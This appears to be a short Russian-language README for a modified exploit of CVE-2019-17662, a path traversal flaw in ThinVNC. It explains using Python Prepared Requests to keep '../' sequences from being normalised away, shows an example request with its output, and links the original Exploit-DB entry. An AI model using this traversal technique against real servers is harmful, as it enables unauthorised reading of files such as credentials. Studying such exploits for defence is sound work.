
Эксплойт для CVE-2019-17662, уязвимости path traversal в ThinVNC, демонстрирующий обход нормализации URL для доступа к произвольным файлам на целевом сервере.
Изменён код CVE
Использован Prepared Requests, так как в модуле python3 requests нормализуется ../ в URL, например:
Для кода:
r = requests.get("http://123.123.123.123/../../../../../../test")
print(str(r.status_code))
Результат:
GET /test HTTP/1.1
Host: 123.123.123.123
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0
Оригинальный эксплойт:
https://www.exploit-db.com/exploits/47519